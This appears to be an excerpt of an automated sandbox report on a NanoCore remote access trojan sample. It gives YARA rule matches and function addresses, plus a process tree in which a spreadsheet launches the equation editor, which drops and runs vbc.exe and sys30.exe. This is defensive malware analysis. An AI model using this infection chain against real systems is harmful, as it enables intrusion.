Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00380B77 6_2_00380B77
Source: C:\Users\Public\vbc.exe Code function: 6_2_003824C0 6_2_003824C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00383D88 6_2_00383D88
Source: C:\Users\Public\vbc.exe Code function: 6_2_00385CA8 6_2_00385CA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00384638 6_2_00384638
Source: C:\Users\Public\vbc.exe Code function: 6_2_0038462A 6_2_0038462A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0038C708 6_2_0038C708
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D8BB49 6_2_00D8BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_0038F038 7_2_0038F038
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_003824C0 7_2_003824C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00380B77 7_2_00380B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00383D88 7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_0038C118 7_2_0038C118
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00384638 7_2_00384638
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00384630 7_2_00384630
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00385CA8 7_2_00385CA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C20048 7_2_00C20048
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C25478 7_2_00C25478
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C22E30 7_2_00C22E30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C23560 7_2_00C23560
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C27D68 7_2_00C27D68
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C21370 7_2_00C21370
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C24C50 7_2_00C24C50
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C26C20 7_2_00C26C20
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C20021 7_2_00C20021
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C247C8 7_2_00C247C8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C247D8 7_2_00C247D8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C28998 7_2_00C28998
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C23550 7_2_00C23550
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C21368 7_2_00C21368
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C25F28 7_2_00C25F28
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_0122BB49 7_2_0122BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 8_2_00250B77 8_2_00250B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 8_2_002524C0 8_2_002524C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001CE018 9_2_001CE018
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001CBBA8 9_2_001CBBA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001C43A0 9_2_001C43A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001CAF90 9_2_001CAF90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001C3788 9_2_001C3788
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001C4458 9_2_001C4458
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_001CBC66 9_2_001CBC66
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062F59C 9_2_0062F59C
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_006277A0 9_2_006277A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062C9A0 9_2_0062C9A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_00626B88 9_2_00626B88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062DE90 9_2_0062DE90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062D5A8 9_2_0062D5A8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062D5B8 9_2_0062D5B8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062D676 9_2_0062D676
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0062785E 9_2_0062785E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_01024300 9_2_01024300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_01023A10 9_2_01023A10
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0102035E 9_2_0102035E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_010202A0 9_2_010202A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_010236C0 9_2_010236C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 9_2_0122BB49 9_2_0122BB49
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Code function: 7_2_00C26618 CreateProcessAsUserW, 7_2_00C26618
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Memory allocated: 76E90000 page execute and read and write
Source: Enclosed.xlsx ReversingLabs: Detection: 29%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Enclosed.xlsx
